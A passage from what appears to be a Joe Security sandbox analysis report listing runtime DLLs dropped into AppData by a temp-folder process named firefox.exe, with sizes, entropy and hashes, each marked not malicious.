SHA-512: 6279922FCB3ACCBAC15406815DDC557735346245172285CF1C368434B45C9EFBAFDF8215CE6112292BFD4B2C8EB4642A0560CAE17337D6F51D86137C41B12D6C
Malicious: false
Reputation: low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-debug-l1-1-0.dllProcess: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes): 17600
Entropy (8bit): 7.2077822511556215
Encrypted: false
MD5: 405BB6A7CD56CBF5276C3A8DC631963D
SHA1: B4CF791ACE3F6790D45B54A0E6AEB6EBAC748C97
SHA-256: F654E56C4299F507BC34271B6BAA29290FD4919B853E17D7470596CAD779F063
SHA-512: EC892ECE3EB6A211BB8A03F5C5FEBDC4D2F6667079E38A17E3D59195D519E95B03063A3957D4F1180B232A67A2487F8A2D3D2F9312390FEABBD78FADAD1E9FD4
Malicious: false
Reputation: low
Copyright Joe Security LLC 2018 Page 23 of 149
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-errorhandling-l1-1-0.dllProcess: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes): 18104
Entropy (8bit): 7.131532401171639
Encrypted: false
MD5: 9A4FC3727AAF02C3285B47DF5EE56244
SHA1: F88E1EA0BA66D1615D7E1D53C95D8E8DBE6BEBE0
SHA-256: 891CCFEB349116283326262C27B8894B43CDC89B8AFD5BA7D21B891814A68075
SHA-512: 3025CCF26BAB11AEC6476C8091968EA040BB37BD9244F6F9DD4AF0FB79D543266420876A64A9FDCDEEA0BB10932E416EF6909D6ECBAF6577D7AE86F17A71E4B9
Malicious: false
Reputation: low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-file-l1-1-0.dllProcess: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes): 21696
Entropy (8bit): 7.0116845824999805
Encrypted: false
MD5: 6B937FE1EFF0E440B124BBB9334DF34D
SHA1: AB3982AB9D46BAA67B1D59728BC6E93C45872B2B
SHA-256: 71C87C14BC1BD0B20D9F68D4943E93C4C6DDC1B6CF252938BB15FE562552F93E
SHA-512: 13D58EACBAC1D97F780BDF87A29CEEA047F6AC1002C6D79FC661FE7AA759C654BA14842D840887B41C48A15E06ED8358FC1A7E124DD6123D2145F1254364B82F
Malicious: false
Reputation: low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-file-l1-2-0.dllProcess: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes): 18112
Entropy (8bit): 7.106107140155806
Encrypted: false
MD5: EA4AE42721460002DC31515F295AD1C4
SHA1: 8A970D589AA4C178083EE8FB65798A6DDECDC1CF
SHA-256: 668F91E94E76DB4457184909E6A1AB4655E81A8EF37DC37B4ECFE93146C29A88
SHA-512: 5EA1F2FB8BE9FFDF80250B47A440DDB3A41E46A8CE73B6F4834E59CB8D30A1B474F6A33D716EFA43AC7EE52D37AC941F3D51021792B9D1439C831B8A368781B9
Malicious: false
Reputation: low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-file-l2-1-0.dllProcess: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes): 18112
Entropy (8bit): 7.1620766534253555
Encrypted: false
MD5: AD895B2A99A3EC18F1690BBAC1E2037A
SHA1: 19FAB11CA8D2AB4A3C1A863209CBDC77A69E1AED
SHA-256: A11C772B2451B0C9C706B03381819E4A1DEF3E2FBBBA8362509BBE57DBD5C666
SHA-512: D021A5B8451BB8BAC27B4F496A1A25E0A2B2F90C93A7E27850303C5FEB9441F9B926B13EF024C176827E190F2DC04F401205983510DFAB0946674D18994BBE8F
Malicious: false
Reputation: low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-handle-l1-1-0.dllProcess: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes): 18112
Entropy (8bit): 7.1097867214760235
Encrypted: false
MD5: 0A0084D4B3635E4D8EBAB587DCFCC16C
SHA1: 5619483328D58AD6B4D2A8A860DABED1BBDB8091
SHA-256: 5089484C8C56AC8E095CADC3DC971DF71EDEB52F856940632821FD37E81AE5CA
SHA-512: D50989131E3B66335F9972E46D056FF1CE585AC90877C388B35BC66E285D24CC4FBC6688F62543CAF3DF86D3E3D1087BDC2822C9F69B0978E35BB727FE47B58B
Malicious: false
Reputation: low
Copyright Joe Security LLC 2018 Page 24 of 149
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-heap-l1-1-0.dllProcess: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes): 18112
Entropy (8bit): 7.177990634000795
Encrypted: false
MD5: 0AEAF9CE58CBD0AF1E30D03B45C21F81
SHA1: 1EC04DCA23EB4D28861A16D5CCA0D4FEB91E2E32
SHA-256: 9A5952C82CBCB1A8ECE9C51C258667D9AB96D13EC6455873999FF0BF78C3CAB0
SHA-512: 49F9D30694F6C272E6CB84F71B3801DFF5256D25AC9479ACC6577038783E8B62E36BD0A5A8D07E618830E64749F92DEE0454DD88E132B333D558319FB282EF7A
Malicious: false
Reputation: low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-interlocked-l1-1-0.dllProcess: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes): 18104
Entropy (8bit): 7.190985597083441
Encrypted: false
MD5: 13BBF7740AFC464172B00F9638BC4F81
SHA1: A92D84A10B161342FCF0E51AD1C287F9B8890525
SHA-256: FF482F69F2183B5FD3C1B45D9006156524B8F8A5F518E33D6E92EA079787E64D
SHA-512: F572E67384EF07790AAAEC8C8E5CAB6C4E9ED954CAF95033CB31121185780A9CD74A5AB123F744F1AE7F889D8DFC9F8AA3BE70999224FD6A1A37FF27BD8AB0D0
Malicious: false
Reputation: low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-libraryloader-l1-1-0.dllProcess: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes): 18624
Entropy (8bit): 7.128506970533883
Encrypted: false
MD5: 8F239C629F09E1B49CF1F03304AB8E69
SHA1: D54DBE7E79A8389B3BAE3273487BC22D4B99781A
SHA-256: D8D74FB87F94A587582D56934816362B992B712E47C39F13D957058F17724886
SHA-512: 130D1BB38C757BBCE7B3C558624028C771FA1198B8D02F0BE1F210A688E5779F8FCBB44154678E898D6FBA4EC31D03664CC84D063816E977361D4ECABAD7911E
Malicious: false
Reputation: low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-localization-l1-2-0.dllProcess: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes): 20672
Entropy (8bit): 7.088938940487771
Encrypted: false
MD5: 41A0D67BA3833D230F1229FF058BE057
SHA1: A66FDA76D97D059067F11C3E03869A1B9DA439A0
SHA-256: 4F11443A2FA6C714D3E33597F0D08DE4E11A6A2FDB7DE2E4A01ADDD5977665C5
SHA-512: A4138CC25AC899059A702F4E078E7662F15B7059089E53B6EB1A78A1BBEBC03704421BDD0A5FCBDFFD48BE2842D587E4E3E56D881F0462F60CDDC5C75FC14F2F
Malicious: false
Reputation: low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-memory-l1-1-0.dllProcess: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes): 18624
Entropy (8bit): 7.096735184430082
Encrypted: false
MD5: 536F07C04C316AAC61AB64A492ED9191
SHA1: 0A2F45D0BA54C4FB5DECBB111BBCC9088FC3269E
SHA-256: 50BF87DA10AE3F442C457E42D6666993B0FCA7C5D4DF521E8CD0959995FBCDDC
SHA-512: B0EC28B75761494A6121C56811DABC297B8E1EA1D56EE4B06A4488D36C16BD26015F2CE945BF9F74B455864828D321AF5DD8B66F839A047458A98984B9343819
Malicious: false
Reputation: low
Copyright Joe Security LLC 2018 Page 25 of 149
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-namedpipe-l1-1-0.dllProcess: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes): 18112
Entropy (8bit): 7.167129892042716
Encrypted: false
MD5: 87B1814412CDAC3D08FAD8DD3A79EBAD
SHA1: CA1946721D023BE9825A5AFAC4364248A56111E1
SHA-256: 2F4690B3C2587C0BFB81AB701D50E497406994613151FAF007423C59CA5E2281
SHA-512: 999D6EEB454760A422FAB3B1F1D3DE6B99789838FDFE88F78A3AF52842672F67BB4CA05AE157BF68CEE6D96A1F4B0924555DA67A4FFAD9DB9044E411E071D206
Malicious: false
Reputation: low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-processenvironment-l1-1-0.dllProcess: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes): 19136
Entropy (8bit): 7.06770071137197
Encrypted: false
MD5: 87E0EF2D5DF6F6E18E6EA9171E3D77E7
SHA1: EB6A1D8D169A683BD1357877AC94BFC98799FEEB
SHA-256: 9B5A5536AED84D45A00DA1056AF4762FEC805EABA742C6BF2D2FCA60993711BB
SHA-512: AB0CB69F13793604E7D3BB97D6CEE38CCA0CDB4889C10F228119713902211C0AEB8A493307FAAC614D05A669BD2E172D83C0AED494751D50DE1874D4AA90D379
Malicious: false
Reputation: low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-processthreads-l1-1-0.dllProcess: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes): 20160
Entropy (8bit): 7.084664816938566
Encrypted: false
MD5: 066874FF22E1C100DC56C4AE76D2E1C2
SHA1: 896031A6BB845525A6AAB4B56A4DB2805E797A65
SHA-256: 979FF0E25E7EA00B8714C9EF2DC8417E69AFAC137EA88F77F8F5A9FFEAA31923
SHA-512: 0DCF7F1956C980CDBBA6279C7E4D80F30D85AA37D3507166E0B67F008FCFABD00CB8E27532A362218EF3EBF66D92CA3D97A23D1028B83DFFE36AA6E953F3D83E
Malicious: false
Reputation: low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-processthreads-l1-1-1.dllProcess: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes): 18624
Entropy (8bit): 7.107805652186164
Encrypted: false
MD5: F43A8E9CD787B6D91BB29DBB8EB1A4E5
SHA1: 336B61853627E6E64A10FBB930577D30334E615E
SHA-256: 5BACBBE62E36AD0F6D7742E70361F26BC56A44DBD28CC0291F588420E0C218A6
SHA-512: 1FDC1170907346EF0ECED900DE9091136A6626C4BFC8B4416DFEBBE356F35F9C2BE0D2CF6C37E3DD231F3DB8B5A3AFE8973F15A45544C0C1C10682FE03911616
Malicious: false
Reputation: low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-profile-l1-1-0.dllProcess: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes): 17600
Entropy (8bit): 7.186846642215803
Encrypted: false
MD5: A616102234EC5AB394FF1C77DA34F6C0
SHA1: 51E54AAFF7F4902B40E657F31775E50000F8240A
SHA-256: 619E5120BFDD11461672CE8798DA00166E57C528B9AFD80404D2C9CBE87E2C07
SHA-512: C360C045D7CCC3D61FFDF35C3253D7F9C59A759A2EE1583519405D2751C12BACC7B26FA383EB53A0156797905F16F26E28293944A0CA31955E03CC07412F822C
Malicious: false
Reputation: low
Copyright Joe Security LLC 2018 Page 26 of 149
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-rtlsupport-l1-1-0.dllProcess: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes): 17600
Entropy (8bit): 7.194045699834861
Encrypted: false
MD5: 0AE94670FBD69ED5F8C923B75CE2C0BD
SHA1: ED53B6E73B867E23881244926B0DEA1524515672
SHA-256: 6D541B215CFA452E54DC6AF9317A7FC24043FA465EF2B561E0F245A4870B2705
SHA-512: 64886E61537830F013A576E40F83D5BC057EFBAB1F3839D5F30A98CBEAAE62F916EF2AFBA6EC9F7CEFDA89907DDA9F704105CAE59CB880F8148F34F3F011562B
Malicious: false
Reputation: low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-string-l1-1-0.dllProcess: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes): 18112
Entropy (8bit): 7.133848449054411
Encrypted: false
MD5: 4C745DC13735B4822FF160CB18B61E22
SHA1: CDC23598548A2F1CBF9AC2BA1003B6D6AF0471D0
SHA-256: 550D4FC902F25F2A0C09F475B5CECEE43FB3A0A042126479560B0001DB5C4891
SHA-512: C4AC87FCD7F2130651C69D939929C013E663EB14502452808AB887A735F3DE34EF28E9C98491C3D427B936D3E53C2840F3195ED6EE62D10730DA29267D78149B
Malicious: false
Reputation: low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-synch-l1-1-0.dllProcess: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes): 20160
Entropy (8bit): 7.045772919081531
Encrypted: false
MD5: A0DFBD2A68A979D1152E2B9153BB497B
SHA1: 9BE79E52750719AD7B014F803CCF1C8D04C932DE
SHA-256: BFF7EA28E198C7DBEE45D35FD98AE03696E9E252D46BEC9FF7B7823CBA1681F1
SHA-512: 238239FFC9034618DEC8161E15CBDD3B727F1615EF057193C95CED158DD42D876398CFC4854CB790B9DF0EA999F53A980D475ED4827335880D2A47CEA10BD7B5
Malicious: false
Reputation: low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-synch-l1-2-0.dllProcess: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes): 18624
Entropy (8bit): 7.135353533119842
Encrypted: false
MD5: 2674310F6FC087862B215B26A5D6DA5B
SHA1: 6E226A29124716FB6C5C54CBBF3C2B6F727C9E5A
SHA-256: E29EAA099BE15958CB65D03D47959CAE2DAC342402856C5F0E4DA672193C329D
SHA-512: 86964E2A71A32D7FD0C6F3061ECBE66DD10D4938E0F5E3572F962B53107524259F62001BDFF7E4C9173A6B8270F46B76C1037DC69B8343F10E4B4E59BD8D6782
Malicious: false
Reputation: low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-sysinfo-l1-1-0.dllProcess: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes): 19136
Entropy (8bit): 7.06799010155914
Encrypted: false
MD5: 1A16AB59D63A2D6A37D3ABD032958631
SHA1: FC76579F19ABB0F24E1AFEA30E1C85FFED6CBC0F
SHA-256: 81926C2B97A7B01061C5042DA0005F0B64FE9E07852478B2A65E8A8EB5560B1F
SHA-512: F3808B1566193AA9024B30477A530CD616174E8B310D455A368F89B2BC6C90D998F4CC611030F7801CBBEB3598DDF78968D628C56C44ED1631A3262159AFD4D7
Malicious: false
Reputation: low
Copyright Joe Security LLC 2018 Page 27 of 149
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-timezone-l1-1-0.dllProcess: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes): 18112
Entropy (8bit): 7.169892235758202
Encrypted: false
MD5: FD14FCD1550F17701FBF239645B606FA
SHA1: 0D7B1DE80DB94DABAD3CE91D31FDA1A8A1A6CFAB
SHA-256: A5453CD2B5E98D40CA17DD20A8F5974F29DE7236A076867A3BC3CBCA441BE928
SHA-512: 162559D9E6E36BFFE32BE41F75075E711E6947ADAB2AD3BB37CF03E02E787AD5A6F3FB93AF4B6C3F82E1107DC401D32DBD53FCBA39F85839910E852C1109DB5B
Malicious: false
Reputation: low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-util-l1-1-0.dllProcess: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes): 18112
Entropy (8bit): 7.094588451141472
Encrypted: false
MD5: 1B5A116DAF8D01FDD0488666803DB17F
SHA1: DA47F3A722A75AE04662B5A6C486DEC6AE7379EA
SHA-256: 48D491B08D395A8AC47CC22A70D1C3F5E84D716AFE2678E825F24492E8FF2ED4
SHA-512: 4E4FDF0AEF5DD17F314A4B93AE521FD3E9E6B5C06EE17688DDEB280BA5C42FC72C75DB745B83ECEB740E5A747C0ABE07627457D6CCB0692DC5E65C96BDE96509
Malicious: false
Reputation: low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-conio-l1-1-0.dllProcess: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes): 19136
Entropy (8bit): 7.07970746470874
Encrypted: false
MD5: 93FD7C2F4A8007521E2D1A73B6C21E6F
SHA1: FA2F6A112876613C8DB0276644F229F0C13EDAD1
SHA-256: 3737D7875668EB4812AB01FE82226D758D480128C76BC234806BFD40694CF048
SHA-512: 2390C17625E3377980E0B267E14EF572CF0E88F30A392C7E64A941F2FA98ED9D054B06ADC583FB44CD777D610F7F3CC4D5D26982D297D7DF938263F92AD5A876
Malicious: false
Reputation: low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-convert-l1-1-0.dllProcess: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes): 22208
Entropy (8bit): 6.921271327164854
Encrypted: false
MD5: BC0BE695E63548171105C57D2E9B98E7
SHA1: 0C4506B330487C4B45900B06DFE0A3249F6B9D88
SHA-256: D16C5B0E19870E86354B5E6CDC4C81E80777749F6BBE6B675F680CEC0FFAE35D
SHA-512: 095EF210F55233A0C0EB80FC2D94646DE96CB2E66D1994D631FA82E5A71A5C26B32D33ABC19AC69E64BD3E4789EB1A7595818A90494038EA1771C210CD81CB2A
Malicious: false
Reputation: low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-environment-l1-1-0.dllProcess: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes): 18624
Entropy (8bit): 7.081538661952178
Encrypted: false
MD5: 6BFBF95B7253F32A77BACDF119B678F3
SHA1: 3E3522A9D62940E1E3C0ED6F785AF0B5E3A33600
SHA-256: 9FC2486ED5D3FFF78DEB69A7386F4575451D43B67F759AFB056AC66B82041E3D
SHA-512: 603A5A199A19028B2E496051772517C488FD3FCC05DD6BEC51E15C58DAD2981F7DAB44C3D7E1BE836AFE8F3CF35AC90E574F0062737C353079E33096DBA26F10
Malicious: false
Reputation: low
Copyright Joe Security LLC 2018 Page 28 of 149
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-filesystem-l1-1-0.dllProcess: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes): 20160
Entropy (8bit): 7.084485679603242
Encrypted: false
MD5: 07BA5F40C64134E5749DF0E8CFEE082E
SHA1: 5B872A7EA316B6B3BA604B88045B9B6F34BA4C8B
SHA-256: 136E5DE4B535AABF6368C06F82339D2EF6C34165661F40433BCEF4EBB90B30FE
SHA-512: 55B5C739D08F5627D9453709CC0D3D20C3FC08E9A1168F70381B49F8FDC8D91F15DB85DB51D47AAAE612CBE920BB3BA83075E74888B2D62E3A962F181B3D2C12
Malicious: false
Reputation: low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-heap-l1-1-0.dllProcess: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes): 18624
Entropy (8bit): 7.163311181625049
Encrypted: false
MD5: CB4E401CE4FC657CCEBB85F96840CC8B
SHA1: 359910F84B5FAF0D194D534C2F631DB5074EA28D
SHA-256: B90BFFA9E03FFD4ECF1D0D709C60F61D13490E84C4550EF06586BC9B1024ED00
SHA-512: 382DF8909DC347DD86696756CD22650EE9BE45146FFDF3B400DA4E370C7C42BCDD4C7FDB807E5A9161211B975B9750EE6CB2B2E2132AAD9D3F90DB9956C2275E
Malicious: false
Reputation: low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-locale-l1-1-0.dllProcess: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes): 18624
Entropy (8bit): 7.132065899718217
Encrypted: false
MD5: B53D96644F5774FE29BA8BB12D6E5F66
SHA1: 260CBBADA90E29EE8E308996E973CE635496D53C
SHA-256: BE19250A19ED49CE247999D6F0B953EDC2AB7C66B46F1CFBD0C24BE91B84B297
SHA-512: E894CAE26EA86325A9012EC2A00086E136AFE64F38F8DA8B3C5EE1CCAD87B1DCF502AD41E050C1ECFBC1C45D2C69A3C35C5322765EF92DDAF00E5E9953F3436F
Malicious: false
Reputation: low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-math-l1-1-0.dllProcess: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes): 28864
Entropy (8bit): 6.66295566360206
Encrypted: false
MD5: 49A69484B524C6F9FD641E015DD15154
SHA1: F6EC9E38D05ED66E8431B909ABA0451EF8C9B540
SHA-256: 69C637C0BE7DDFE0690D8C642EC6D0850085617C3C3DDA9531CAC818F06F66E8
SHA-512: 802D186F4B580541916C038999C0653765F2CB01C345549F6D927F7688B671B234C7EE05F2A9EBA6C139F25C459E579DA4437EE2AC03ED3FE3EBEF849F178553
Malicious: false
Reputation: low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-multibyte-l1-1-0.dllProcess: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes): 25792
Entropy (8bit): 6.781766293773302
Encrypted: false
MD5: 66F65B59DFF2F8927DC3C8045D8C3A0A
SHA1: AE459D1B4D6615587D8B9133EC72162C717287FC
SHA-256: 414A2BD84B042E2CCF758270647BCFA02D78EB0125C0584DD53F7245481D66B9
SHA-512: 4FA559F7E3B423A736081A67C8A19084288A870307547B19B2DCCAD935AFDC56311A2045CEB4791D1CA33A05F7F1F906C21363A2076436431A118667F298D577
Malicious: false
Reputation: low
Copyright Joe Security LLC 2018 Page 29 of 149
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-private-l1-1-0.dllProcess: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes): 72896
Entropy (8bit): 5.834415075746363
Encrypted: false
MD5: BF090F2290C18F96FD359A6596EA4233
SHA1: BA1FD71AEFFB0E9629CF0DDC5D5E4704627FB0E5
SHA-256: 5710E3ED5819CCAA9CF558AB57534BC880C610C06F2A44ADFAFBFAB5BFC38C2B
SHA-512: 01B3D02B6FB7B6ED7302903D8E2937372A5BA582755CCD73D4FAE2B904F278BD4F38C3C2B0CC12F7DA8AC4DBE204976CFB492D8AFE7497F39B800ADC652BAC64
Malicious: false
Reputation: low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-process-l1-1-0.dllProcess: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes): 19136
Entropy (8bit): 7.067790575145041
Encrypted: false
MD5: E4D419A1897B507E01F75EF88457979F
SHA1: 5C769D5E7FCECBF384D09F340E7DCEB951A2F9C6
SHA-256: 3A2355A23874342777391B4A06C5CDCD990DED287CC4A27FDF0A071AC3B229AD
SHA-512: 65EDB60FD6E897EE2AC74976C47A8B55B8C45BB707C8F1134D78517D0883A16634A3C6142F3A925BE0441D594EEBE90149675D38E4A8DF23D6A68F163F60E611
Malicious: false
Reputation: low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-runtime-l1-1-0.dllProcess: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes): 22720
Entropy (8bit): 6.942253423928934
Encrypted: false
MD5: 11218C9F81404A51D1EB6B56BA60F9AB
SHA1: ACC303D1B1A5822ED7BCF8F666860A0A7AAFFE91
SHA-256: 882DA90B6368056908E9CD21C4719A016E9A3CA597ECA9183892A5806B4A8D4A
SHA-512: 86928D70AEC7BD7170863C0CDEA110F8A4AA244EFB30577310AD1908D71817B8A2AEB45833D5F710B15DF8FE096234CFB069819B0F2B706CFCD15B5614615929
Malicious: false
Reputation: low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-stdio-l1-1-0.dllProcess: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes): 24256
Entropy (8bit): 6.86072682024164
Encrypted: false
MD5: D67520BFF673CAB4B2ED1AF12DE37A1F
SHA1: 752DEACC54982012852E68C37253E95B8BB89AEE
SHA-256: 44BBB2AEC747E1CBC63FC7C4D2E8C5EC1CA9F9D026835AC2CCB0D60971B6107A
SHA-512: A960EC529E6889B0F3253869FC72C4F65615141D23F42D808DE99E192B89B15DBC24B1D37812DC89F68576662173F18BC047A46B92598567E8C7E37E51821AB0
Malicious: false
Reputation: low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-string-l1-1-0.dllProcess: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes): 24256
Entropy (8bit): 6.8602671281732635
Encrypted: false
MD5: E65F76759251845FA1E6A3CF41B5F231
SHA1: DE4517EB0D8B330D3C2717E786F485150CAF82EC
SHA-256: 034A8ABF2BF027AD950FDF8FBDF488188C8D02EBA8E160AA95DE376FF1F32FE6
SHA-512: AFC7D0A26B2FFEFB43846D621585FC35A2CE280EEF1D046DA5A327F20AE7B023CCEB2BFD64176787AB86A76567E233215427686243E62ECA5DED1AD14B19B5B5
Malicious: false
Reputation: low
Copyright Joe Security LLC 2018 Page 30 of 149
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-time-l1-1-0.dllProcess: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes): 20672
Entropy (8bit): 7.0106564368261175
Encrypted: false
MD5: 1622347A34EBA068916713CF28F46B67
SHA1: 18B3960E88118195F17C4BEF47DF1F7935CEE459
SHA-256: 9766C4200B3F51630097FCE8D4F10B33383E663601802ADA72660604876C99E9
SHA-512: 90B2398918487E0CCFE8F859AEE6E729A4063A110204644A75649331F10895B6C4DE09E57B6E20E8FAC04AC413F54A82889E602D05F5F42690B87D9C2253FA2E
Malicious: false
Reputation: low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-utility-l1-1-0.dllProcess: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes): 18624
Entropy (8bit): 7.127398472524706
Encrypted: false
MD5: F7AF6BB63229721005C8AC85DC86F5C2
SHA1: 35DDD88FBEA433A7E934AB0CA64907F8B0A85D9A
SHA-256: FA10F7E2AB54C2EBCD4688E39BC4AF1544FA21B73BE7FD0562B3FF7CFF041F7A
